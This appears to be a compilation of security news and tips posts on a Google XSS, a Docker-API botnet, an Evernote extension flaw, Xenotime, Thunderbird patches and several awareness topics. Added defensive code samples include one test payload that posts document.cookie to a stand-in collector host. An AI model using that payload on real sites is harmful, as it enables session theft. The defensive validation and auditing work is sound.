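The bug hinged on two things: a file type check that ran only in the browser, and a stored file being rendered as a page in the internal domain. The following is an added example, not Google's code or the researcher's, of the server-side validation and response headers that close both halves. The type is decided from the bytes, not from the filename or the declared Content-Type that the researcher edited in his proxy, and stored files are always served as `application/pdf`, as an attachment and with `nosniff`. The sample PDF, the HTML payload and the size limit are constructed assumptions.

```python
"""Server-side upload validation and download headers for a PDF-only portal.

Added example, not Google's code or the researcher's. The sample file
contents are constructed. Two ideas: decide the file type from the bytes
rather than from the filename or the declared Content-Type (both are attacker
controlled), and serve stored files with headers that keep the browser from
rendering them as a page in the portal's origin.
"""
from typing import Dict, Tuple

PDF_MAGIC = b"%PDF-"
MAX_BYTES = 10 * 1024 * 1024  # assumed size limit for an invoice


def validate_invoice_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Accept a file only if it is a PDF by content. Returns (accepted, reason)."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not data.startswith(PDF_MAGIC):
        # This is the check that defeats the bypass in the write-up: renaming
        # the file and editing Content-Type in the request does not change
        # the bytes that were uploaded.
        return False, "content is not a PDF"
    if declared_type != "application/pdf":
        return False, "declared Content-Type must be application/pdf"
    if not filename.lower().endswith(".pdf"):
        return False, "extension must be .pdf"
    return True, "ok"


def download_headers(stored_name: str) -> Dict[str, str]:
    """Headers for serving a stored invoice to an employee.

    The Content-Type is fixed by the server and never copied from the upload.
    nosniff stops MIME sniffing, attachment keeps the file from being rendered
    inline, and the sandbox CSP is a second layer should the bytes ever be
    treated as a document (a polyglot with a PDF header and an HTML body)."""
    safe_name = "".join(c for c in stored_name if c.isalnum() or c in "._-") or "invoice.pdf"
    return {
        "Content-Type": "application/pdf",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample inputs: a minimal PDF and the kind of payload the
# write-up describes (an HTML file presented as an invoice).
MINIMAL_PDF = b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\ntrailer<</Root 1 0 R>>\n%%EOF\n"
HTML_PAYLOAD = b"<html><script>fetch('https://collector.example/?c='+document.cookie)</script></html>"


if __name__ == "__main__":
    print(validate_invoice_upload("invoice.pdf", "application/pdf", MINIMAL_PDF))
    print(validate_invoice_upload("invoice.html", "text/html", HTML_PAYLOAD))
    print(download_headers("../evil<>.pdf"))
```

Even with these headers, user-uploaded content should be served from a dedicated origin that carries no session cookies, so that any future bypass cannot run in the internal apps' origin as this one did.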

Below the timeline for the flaw:

21.02.2019: Vulnerability reported
22.02.2019: Priority changed to P2 
22.02.2019: Added more information 
25.02.2019: Accepted and priority changed to P1 
06.03.2019: Reward issued 
26.03.2019: A fix has been implemented 
11.04.2019: Issue marked as fixed

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post XSS flaw would have allowed hackers access to Google’s network and impersonate its employees appeared first on Security Affairs.

“Human Error” Is The Biggest Corporate IT Issue

Here we feature stories of virus infections, phishing incidents and other issues affecting the private and public sectors because of external risks. However, many IT troubles in companies are not caused by outsiders but by human error inside the organization. It is worth thinking about how employees really perceive rules such as “do not leak information”, “don’t do this” and “don’t do that”. There are so many rules that people in the organization forget some of them, sometimes with nasty results. Recovering from a very bad “human error” is no walk in the park for any company.

Below are types of human errors:

1. Human Error in Management

It may be difficult to understand what a “management error” means; examples are:

  • Loss of personal information after an office move.
  • Insufficient confirmation of the delivery of personal information, so that personal information that should have been received is lost.
  • Disclosure of information because the management rules were never clarified and the information was disclosed by mistake.

Even when a company has information management rules and security policies, management is not always done according to those rules, or such rules may never have been decided at all. This shows that thorough security education for employees is important, as are clear management procedures for company information, including personal information.

2. Misoperation

This applies to both emails and faxes: entering the wrong address, the wrong content, the wrong attachment, and so on. It is one of the most common of all human errors, and employees need thorough security education so as not to make such mistakes.

3. Unauthorized access

Although the rate is low compared with mismanagement and mis-operation, unauthorized access from the Internet is continuous and its attack methods keep evolving. Since it is often accompanied by malware, it is important to be careful, as a successful attack leads to the theft of a lot of personal information. Basic security measures such as installing anti-virus software are important but are not an absolute defense against unauthorized access.

4. Lost and misplaced

This is the case where information equipment such as a personal computer, together with the data it contains, is taken outside the workplace and is lost or misplaced. Nowadays tablets and smartphones contain a lot of information, so they require careful handling. Devices are frequently left behind after a night of drinking, which is the worst case. Because loss and misplacement occur at a high rate, measures such as strict rules for taking data out of the office are necessary.

5. Unauthorized takeout and theft

Raise awareness among those who handle information, and implement mechanisms so that information cannot easily be taken out of the information system and cannot be used even if it is taken out. This is based on the idea that access to information and security precautions must be addressed both by the person who uses the information and by the system that handles it; in a typical organization, neither is enough on its own.

Practical ways to prevent IT issues caused by “human errors”:

  • Information learned at the firm should remain in the firm. Do not take information assets of the company or organization outside; specifically, do not take your laptop computer, USB memory, etc. home without permission. If permission is granted, make sure the storage devices are encrypted so that a lost laptop or storage device does not leak information.
  • Do not leave important documents on the desk; likewise, never write critical information on post-it notes and never stick them on the monitor.
  • Do not leave the computer without locking the screen.
  • Do not discard information assets without taking measures. Be sure to erase them: specifically, when discarding a PC, be sure to wipe the data on the hard disk, if not physically destroy the disk.
  • Do not bring private equipment (PCs etc.) into the company unless BYOD is allowed.
  • Lock and no loan: do not lend or transfer the rights given to you as an individual to others without permission.
  • Confidentiality: do not disclose information learned on business without permission.


Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are exploiting misconfigured, publicly exposed Docker Engine APIs to get inside containers and run the Linux bot AESDDoS.

Hackers are targeting exposed daemon APIs in the open-source version of the popular DevOps tool Docker Engine - Community to infiltrate running containers and deploy the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for Docker daemons listening on TCP port 2375 (the unencrypted, unauthenticated API port) and use them to deliver malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware has been active since at least 2014 and was used to build large DDoS botnets; in some cases it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and sends it back to the C2; depending on the hardware configuration, the attackers can choose which activity to carry out (i.e. launching DDoS attacks, mining cryptocurrency, etc.).

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

To secure Docker hosts, admins should allow only trusted sources to reach the Docker API; some recommendations from Trend Micro follow.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”
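The first of those guidelines, checking the API configuration, is concrete enough to automate. The block below is an added example, not Trend Micro's or Docker's code: it audits a parsed daemon.json (or a running dockerd command line) for the exposure this campaign abuses, a `tcp://` listener without `tlsverify`, and also flags listeners bound to every interface. The configurations in it are constructed test data and the certificate paths are assumptions.

```python
"""Audit a Docker daemon configuration for an exposed, unauthenticated API.

Added example, not Trend Micro's or Docker's code. The daemon.json `hosts`
list and the `-H/--host` flags of dockerd are the two places a TCP listener
is configured; this checks either. Only the `tcp://host:port` form is
handled. The configurations at the bottom are constructed test data.
"""
import json
import shlex
from typing import Dict, List
from urllib.parse import urlparse

PLAINTEXT_PORT = 2375   # Docker's conventional unencrypted API port
TLS_PORT = 2376         # conventional port for the TLS-protected API


def tcp_listeners(hosts: List[str]) -> List[str]:
    """Keep only tcp:// entries; unix:// and fd:// are not network reachable."""
    return [h for h in hosts if urlparse(h).scheme == "tcp"]


def audit_docker_config(config: Dict) -> List[str]:
    """Return findings for a parsed daemon.json; an empty list means no issue."""
    findings = []
    tcp = tcp_listeners(config.get("hosts", []))
    if not tcp:
        return findings
    tls_verify = bool(config.get("tlsverify"))
    certs_complete = all(config.get(k) for k in ("tlscacert", "tlscert", "tlskey"))
    for h in tcp:
        u = urlparse(h)
        host, port = u.hostname or "", u.port
        if not tls_verify and port == PLAINTEXT_PORT:
            findings.append(f"{h}: unauthenticated API on the conventional plaintext port")
        elif not tls_verify:
            findings.append(f"{h}: TCP listener without tlsverify (anyone who can reach it is root on the host)")
        elif not certs_complete:
            findings.append(f"{h}: tlsverify set but tlscacert/tlscert/tlskey incomplete")
        if host in ("", "0.0.0.0", "::"):
            findings.append(f"{h}: bound to all interfaces; bind to a management address or firewall port {port}")
    return findings


def audit_dockerd_cmdline(cmdline: str) -> List[str]:
    """Same audit for a running daemon, from its argv (ps output or a systemd unit)."""
    args = shlex.split(cmdline)
    hosts: List[str] = []
    cfg: Dict = {}
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if a.startswith("--host="):
            hosts.append(a.split("=", 1)[1])
        elif a in ("--tlsverify", "--tlsverify=true"):
            cfg["tlsverify"] = True
        elif a.startswith(("--tlscacert=", "--tlscert=", "--tlskey=")):
            key, value = a[2:].split("=", 1)
            cfg[key] = value
        i += 1
    cfg["hosts"] = hosts
    return audit_docker_config(cfg)


# Constructed test data: the exposure the campaign scans for, and a hardened layout.
EXPOSED_CONFIG = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", f"tcp://10.0.0.5:{TLS_PORT}"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",          # assumed paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/docker/daemon.json"
    try:
        with open(path) as fh:
            cfg = json.load(fh)
    except FileNotFoundError:
        cfg = {}   # no file means Docker's defaults: unix socket only
    for finding in audit_docker_config(cfg) or ["no findings"]:
        print(finding)
```

Docker's documented hardened layout is a `tcp://` listener on 2376 with `tlsverify` plus a CA, server certificate and key, with 2375 left closed or firewalled; a unix-socket-only daemon produces no findings because it is not reachable over the network. This is a configuration check only; it says nothing about whether a container has already been entered with `docker exec`, which is what the runtime scanning in the last guideline is for.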

Pierluigi Paganini

(SecurityAffairs – containers, hacking)

The post Crooks exploit exposed Docker APIs to build AESDDoS botnet appeared first on Security Affairs.

S&P Cautioned The US, Huawei Ban Bad For US Firms

In the ongoing trade war between the United States and China, embattled electronics firm Huawei has found an ally in none other than Standard and Poor’s (S&P), a credit rating agency. S&P cautioned the United States that its strong anti-Huawei stance will likely hurt the profitability of the electronic component suppliers from which Huawei buys to build its fleet of smartphones and networking equipment. The Huawei ban, imposed by US companies in compliance with the President’s Executive Order, may also motivate China to develop its domestic industries, especially in the supply chain and the production of electronic parts.

“In turn, this could heighten competition in the technology sector and potentially lower the long-term growth prospects of US technology firms. In the next one to two years, we believe US semiconductor firms will take the biggest hit because many of them count Huawei as a key customer,” explained S&P Global Ratings credit analyst Mark Habib.

The United States government is pushing to cripple Huawei, which it believes to be under the direct supervision of the Beijing government. S&P believes that Huawei, though one of the vendors of 5G equipment, is not the be-all and end-all of 5G technology; the rating agency underscored that other vendors are equally capable of supplying the market with 5G-ready radios for smartphones and other devices.

“The ban adds a headwind to an industry in the middle of a correction due to weak demand after a strong 2018, above-average inventories both at manufacturers and in the supply chain, and elevated tariffs on Chinese imports under the current US-China trade dispute,” added Mark Habib.

In theory, the loss of Huawei means a gap in the availability of 5G radios that will affect the global market. There is no assurance that the rest of the market can fill the void if Huawei releases its 5G products but is banned from the US market. S&P believes that vendors in both Europe and Asia will pick up and fill the gap Huawei leaves, especially in the US.

“If reports of a 5G gap are true, operators in markets facing Huawei restrictions could theoretically see higher equipment spending or delays in 5G implementation. But given the lack of value-added, 5G-ready use case applications, our forecast for 5G investment and customer appetite is bearish, so any incremental increase cost or delay should be nonmaterial to the ratings,” emphasized Mark Habib.

S&P believes there is no immediate pressure for the world to embrace 5G. It is normal for the current mobile technology (LTE) to mature over a long period, though the agency also recognizes that, when it comes to 5G roll-out, Europe will surely lag behind the United States and the Asia-Pacific region.

Apple is a huge company that is heavily dependent on Chinese labor to manufacture iOS devices on time and in sufficient volume. S&P strongly doubts that Apple can move its manufacturing out of China soon enough to comply fully with the President’s EO.

“The consequences for telecom are likely to vary from country to country and largely relate to longer-term 5G investment decisions, which give operators more time and options for managing the fallout,“ concluded Mark Habib.


5 Digital Risks to Help Your Teen Navigate this Summer

Snow cones.

Remember when summer was simple? Before smartphones and social networks, there was less uploading and more unwinding; less commenting and more savoring. 

There’s a new summer now. It’s the social summer, and tweens and teens know it well. It’s those few months away from school where the pressure (and compulsion) to show up and show off online can double. On Instagram and Snapchat, it’s a 24/7 stream of bikinis, vacations, friend groups, and summer abs. On gaming platforms, there’s more connecting and competing. 

With more of summer playing out on social, there’s also more risk. And that’s where parents come in. 

While it’s unlikely you can get kids to ditch their devices for weeks or even days at a time this summer, it is possible to coach kids through the risks to restore some of the simplicity and safety to summer.

5 summer risks to coach kids through:

  1. Body image. Every day your child — male or female — faces a non-stop, digital tidal wave of pressure to be ‘as beautiful’ or ‘as perfect’ as their peers online. Summer can magnify body image issues for kids.
    What you can do: Talk with your kids about social media’s power to subtly distort body image. Help kids decipher the visual world around them — what’s real, what’s imagined, and what’s relevant. Keep an eye on your child’s moods, eating habits, and digital behaviors. Are comments or captions focused only on looks? If so, help your child expand his or her focus. Get serious about screen limits if you suspect too much scrolling is negatively impacting your child’s physical or emotional health.
  2. Gaming addiction. The risks connected with gaming can multiply in the summer months. Many gaming platforms serve as social networks that allow kids to talk, play, and connect with friends all day, every day, without ever leaving their rooms. With more summer gaming comes the risk of addiction as well as gaming scams, inappropriate content, and bullying.
    What you can do: Don’t ignore the signs of excessive gaming, which include preoccupation with gaming, anger, irritation, lying to cover playing time, withdrawal and isolation, exchanging sleep for gaming. Be swift and take action. Set gaming ground rules specific to summer. Consider parental control software to help with time limits. Remember: Kids love to circumvent time limits at home by going to a friend’s house to play video games. Also, plan summer activities out of the house and away from devices.
  3. Cyberbullying. Making fun of others, threatening, name-calling, exclusion, and racial or gender discrimination are all serious issues online. With more time on their hands in the summer months, some kids can find new ways to torment others.
    What you can do: Listen in on (monitor) your child’s social media accounts (without commenting or liking). What is the tone of your child’s comments or the comments of others? Pay attention to your child’s moods, behaviors, and online friend groups. Note: Your child could be the target of cyberbullying or the cyberbully, so keep your digital eyes open and objective.
  4. Smartphone anxiety. Anxiety is a growing issue for teens that can compound in the summer months if left unchecked. A 2018 survey from the Pew Research Center reveals that 56 percent of teens feel anxious, lonely, or upset when they don’t have their cell phones.
    What you can do: Pay attention to your child’s physical and emotional health. Signs of anxiety include extreme apprehension or worry, self-doubt, sleeplessness, stomach or headache complaints, isolation, panic attacks, and excessive fear. Establish screen limits and plan phone-free outings with your child. Set aside daily one-on-one time with your child to re-connect, and seek out professional help if needed.
  5. Social conflict. More hours in the day + more social media = potential for more conflict. Digital conflict in group chats or social networks can quickly get out of hand. Being excluded, misunderstood, or criticized hurts even more when it plays out on a public, digital stage.
    What you can do: While conflict is a normal part of life and healthy friendships, it can spiral in the online space where fingers are quick to fire off responses. Offer your child your ears before your advice. Just listen. Hear them out and (if asked) help them brainstorm ways to work through the conflict. Offer options like responding well, not engaging, and handling a situation face-to-face. Avoid the temptation to jump in and referee or solve.

Summer doesn’t have to be stressful for kids, and the smartphone doesn’t have to win the majority of your child’s attention. With listening, monitoring, and timely coaching, parents can help kids avoid common digital risks and enjoy the ease and fun of summer. 

The post 5 Digital Risks to Help Your Teen Navigate this Summer appeared first on McAfee Blogs.

4 Easy and Simple Ways To Secure Cloud Infra

Amazon Web Services, Microsoft Azure, Apple iCloud, Google Services: those are just four of the largest cloud platforms competing for customers’ mind-share. All four, alongside hundreds of smaller vendors in the cloud computing market, try to outdo each other not just on pricing but also on how user-friendly they can make their UX (user experience). Along with user-friendliness comes the very enemy of security, the “sense of convenience”. The more convenient a service is, the more “leniency” its implementation requires. The reverse is also true: if more parts of a system require specific knowledge in order to operate it, the system is indirectly more secure, since only a few people tend to know its under-the-hood operation.

For the system administrator trying to secure a cloud computing subscription, what can they do to mitigate the potential security gaps overlooked by the vendors? Here we provide a few simple tips on how to increase cloud-platform security without changing your cloud vendor of choice:

  • Build an IT team with a qualified level of expertise in cloud computing technologies. If financial constraints stop the firm from doing so, researching an MSP (Managed Service Provider) with an industry-recognized track record of managing the cloud platform on the firm’s behalf is the next best thing.
  • Maintain reliable user account management: once an employee with access privileges to the cloud infrastructure leaves the company, his/her account needs to be disabled immediately. Since cloud infrastructure is exposed on the Internet, a recently separated employee could still use the account and cause problems in the long run if it is not disabled fast enough. Many cybersecurity incidents are not caused by malware or external hackers but by former employees who harbor ill feelings against their former employers. It is important for every organization to have a fully proactive user account management methodology, as every former employee’s system access is an attack surface.
  • How fast the IT team responds to a problem is another good metric to improve. This is especially true for MSPs: since they are hired externally to perform specific IT support services instead of the company hiring internal IT professionals, the tasks of system administrators are delegated to the MSP under a specific SLA (Service Level Agreement). One measure of a reliable MSP or internal IT team is its patching policy for computers. For Windows, for example, Microsoft releases updates that fix bugs and security vulnerabilities every second Tuesday of the month. A dependable IT support team should not delay Windows Update, especially if the firm is not using legacy applications and legacy hardware.
  • A reliable cloud-infrastructure vendor will always have a clear policy on user file backups. Vendors will always promote their “amazing redundancy” as a feature of their services, so an IT team worth its salt will do further research on the various vendors offering the same services. A well-researched decision is cheaper, safer and more secure for any company that wants to have a cloud infrastructure in place.


Evernote Critical Flaw Could Have Impacted Millions of Users

A critical flaw that affected Evernote’s web clipper extension for Chrome could have impacted millions of users.

Reports say that the critical flaw in the popular note-taking extension Evernote could have led to the breach of personal data of over 4.6 million users. Hackers could have exploited the vulnerability to steal personal data including emails and financial transactions of users.

Security researchers at Guardio had discovered this vulnerability in the Evernote Web Clipper extension, which is immensely popular and which lets users capture full-page articles, images, emails, selected texts etc.

A blog post by the Guardio research team says, “In May 2019 Guardio’s research team discovered a critical vulnerability in Evernote Web Clipper for Chrome. A logical coding error made it possible to break domain-isolation mechanisms and execute code on behalf of the user – granting access to sensitive user information not limited to Evernote’s domain. Financials, social media, personal emails, and more are all natural targets. The Universal XSS vulnerability was marked as CVE-2019-12592.”

Hackers exploiting the vulnerability could divert users to a website under their control and, from there, breach the users’ private data on affected third-party websites. Guardio researchers demonstrated, in a PoC (proof of concept), access to social media, financial transaction history, private shopping lists, etc. Guardio disclosed the flaw to Evernote on May 27; following the disclosure, Evernote patched the vulnerability and deployed a fixed version within a few days. The fix was confirmed on June 4th, 2019.

How the vulnerability gets exploited

In the normal course, JavaScript is injected into the webpages a user visits while the Evernote extension is active, so as to enable the extension’s various functionalities. But because of the above-mentioned vulnerability (CVE-2019-12592), a logical coding error left a function (one used to pass a URL from the site into the extension’s namespace) unsanitized, so attackers could inject their own script into those webpages. This gave them access to sensitive user information available on the webpages.

The Guardio blog post says, “The exploit is triggered by the malicious website and causes Evernote’s internal infrastructure to inject an attacker-controlled payload into all iframes contexts…Injected payload is customized for each targeted website, able to steal cookies, credentials, private information, perform actions as the user and more.”

The Guardio researchers also published a proof-of-concept video in which they explain how the user is first taken to the hacker-controlled malicious website (via social media, email, compromised blog comments, etc.) and how the malicious website then silently loads hidden, legitimate iframe tags of targeted websites. These iframes would receive an injected payload customized for each targeted website, allowing the hackers to steal personal data from those websites.
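The defensive check this class of bug is missing, as an added example that is not Evernote’s or Guardio’s code (the host names, the message shape and the function names are assumptions): a content-script message handler that passes a page-supplied URL through unchanged, beside one that verifies the sender origin and allowlists scheme and host before the URL reaches the extension’s context.

```javascript
// Added illustration, not Evernote's code: a content script receives a URL
// from the page and must decide whether to hand it to the extension's
// privileged context. Host names and function names are hypothetical.

// Hosts the hypothetical extension is allowed to load clipper resources from.
const ALLOWED_HOSTS = new Set(["notes.example", "clipper.notes.example"]);

// Vulnerable pattern (the class of bug described above): the string the page
// sent is passed through unchanged, so the page controls what gets loaded.
function acceptUrlVulnerable(message) {
  return message.url; // no origin check, no scheme check, no host check
}

// Hardened pattern: check who sent the message, parse the URL, and require
// https plus an allowlisted host. Returns the normalized URL, or null to reject.
function acceptUrlHardened(message, senderOrigin, expectedOrigin) {
  if (senderOrigin !== expectedOrigin) return null; // message from another window
  if (message === null || typeof message !== "object") return null;
  if (typeof message.url !== "string") return null;
  let parsed;
  try {
    parsed = new URL(message.url); // throws on relative or malformed input
  } catch (err) {
    return null;
  }
  if (parsed.protocol !== "https:") return null; // rejects javascript:, data:, http:
  if (!ALLOWED_HOSTS.has(parsed.hostname)) return null; // rejects third-party hosts
  if (parsed.username !== "" || parsed.password !== "") return null; // no embedded credentials
  return parsed.toString();
}

// Constructed sample messages: one legitimate, three a hostile page might send.
const SAMPLES = [
  { origin: "https://notes.example", url: "https://notes.example/clip?id=1" },
  { origin: "https://attacker.example", url: "https://notes.example/clip?id=1" },
  { origin: "https://notes.example", url: "https://cdn.attacker.example/extra.js" },
  { origin: "https://notes.example", url: "javascript:void(0)" },
];

// Run every sample through both handlers so the difference is visible.
function runSamples(expectedOrigin) {
  return SAMPLES.map((s) => ({
    url: s.url,
    vulnerable: acceptUrlVulnerable({ url: s.url }),
    hardened: acceptUrlHardened({ url: s.url }, s.origin, expectedOrigin),
  }));
}

console.log(runSamples("https://notes.example"));
```

Only the first sample survives the hardened handler; the vulnerable one returns every input untouched.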

The solution

Users should update to the latest version of Evernote Web Clipper, which includes the fix for this issue. The extension page can be reached by copying chrome://extensions/?id=pioclpoplcdbaefihamjohnefbikjilc into the address bar; for security reasons it has to be copied manually. Make sure the version shows as 7.11.1 or higher.
Users should also make it a point to install browser extensions only from trusted sources.


Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at security firm Dragos reported that the Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware (aka Trisis) was discovered by researchers at FireEye; it was specifically designed to target industrial control systems (ICS).

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014; its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to the ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed to breach the targeted organizations.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that use ICS/SCADA systems similar to those in the oil and gas industry.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” the experts continue.

Dragos presented research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference, held in Atlanta.

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)

The post Xenotime threat actor now is targeting Electric Utilities in US and APAC appeared first on Security Affairs.

Tips to Fix Pname Com Facebook Orca Error on Android

Android users sometimes see pop-up messages on their screen, while using Facebook, saying that Pname Com Facebook Orca has stopped, which naturally confuses them. When the pop-ups appear repeatedly, users don’t know what to do. Today we discuss in detail this rather common issue, known as the Pname Com Facebook Orca error, and suggest some very easy tips to fix it.
Well, let’s begin by discussing what Pname Com Facebook Orca is. It’s actually the name of the Facebook Messenger smartphone app. The Orca folder on an Android phone stores all the cache, plugins, videos, audio, images, and files from the Messenger app.

Next, let’s discuss the commonly noticed Facebook Orca Katana folder as well. This folder, similar to the Orca folder, belongs to the Facebook app and is automatically created when the Facebook app is installed. There’s nothing to worry about with this folder. Like the Orca folder, it serves a purpose, though discussing that is not of much relevance here.

Now, let’s get back to our topic, the Facebook Orca folder, and go a bit more in-depth. Let us tell you at the outset that Pname Com Facebook Orca, though it seems like an issue to many users, is not malware or anything that would cause you damage. Though the repeated appearance of the pop-up message can be irritating, Pname Com Facebook Orca, as we have already said, is just a folder that is automatically created and serves a purpose as well.

The use of Pname Com Facebook Orca…

Pname Com Facebook Orca helps users retrieve messages or conversations that they had deleted from their Facebook messenger app. This is possible since the Pname Com Facebook Orca folder stores all files of Facebook messenger conversations. Well, that’s the reason why the Orca folder takes up so much of space on the phone as well.

Pname Com Facebook Orca Stopped!- What does it mean?

It’s really irritating when a user gets a pop-up message again and again saying that Pname Com Facebook Orca has stopped. While most people ignore the pop-ups, some tend to delete Pname Com Facebook Orca. Neither of these is the right solution. Ignoring won’t solve the issue. Deleting too wouldn’t solve it as it will be automatically regenerated and the pop-ups will start coming again. It’s a permanent solution that’s needed.

How to fix Pname Com Facebook Orca error permanently

Follow these steps to fix Pname Com Facebook Orca error permanently:

  • Go to ‘Settings’ on your Android device.
  • Next, go to the “Application” option, look for “All Apps” and click on it.
  • Select “Facebook App”
  • Clear all data
  • Restart Facebook app.

Following these steps would help fix Pname Com Facebook Orca error permanently. Once you reset your app, you won’t get the error message any longer.

But, in case the issue still persists, you need to uninstall the Facebook app on your device, restart the device and re-install Facebook app from Google Play Store. That would hopefully solve the issue.

Retrieving deleted messages from the Orca folder

If you want to see the Facebook Messenger messages that you have deleted, the “com.facebook.orca” folder helps you retrieve them. Here’s what you need to do to retrieve such deleted conversations:

  • Go to File Explorer or File Manager on your device. If you can’t find it on your phone, download and install from the Google Play store.
  • Open File Explorer and go to SD/Storage card. Open and look for the Android folder.
  • Open Android folder.
  • Open Data folder inside the Android folder.
  • Find the “com.facebook.orca” folder that is part of Facebook Messenger, click on it.
  • Go to the “Cache” folder.
  • Look for the “fb_temp” folder inside the Cache folder.
  • You can retrieve information on group and individual conversations from the backup copies for Facebook Messenger that would be there in the “fb_temp” folder.

Another method of retrieving messages from the “com.facebook.orca” folder is by connecting your phone to a computer using a USB cable and then locating the “com.facebook.orca” folder. From there you could go to “Cache”, then to “fb_temp” and finally get back your deleted messages.


Mozilla addressed flaws in Thunderbird that allow code execution

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could allow code execution on impacted systems. 

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could be exploited by attackers to execute arbitrary code on impacted systems. 

Mozilla released Thunderbird version 60.7.1 that addresses three High severity vulnerabilities and one Low risk issue. 

The three High severity vulnerabilities addressed by Mozilla are:

  • CVE-2019-11703 – heap buffer overflow in icalparser.c;
  • CVE-2019-11704 – heap buffer overflow in icalvalue.c;
  • CVE-2019-11705 – stack buffer overflow in icalrecur.c;

The Low risk issue, tracked as CVE-2019-11706, is a type confusion in icalproperty.c. 

“Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.” reads the advisory published by the US-CERT.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.7.1 and apply the necessary update.” 

The vulnerabilities affect all the Thunderbird versions prior to 60.7.1.  

Depending on the user’s privileges, an attacker could carry out several malicious activities, such as installing malicious applications and creating new admin accounts. 

Mozilla credited researcher Luis Merino of X41 D-Sec for the discovery of the above flaws. The vulnerabilities affect the implementation of iCal functions; they could be used to cause a crash when processing specially crafted email messages.

The expert pointed out that the flaws cannot be triggered via email in Thunderbird because the scripting is disabled when reading mail. The issue could be exploitable in browser or browser-like contexts.

The good news is that Mozilla is not aware of any attacks exploiting the flaws in the wild.

Pierluigi Paganini

(SecurityAffairs – Thunderbird, hacking)

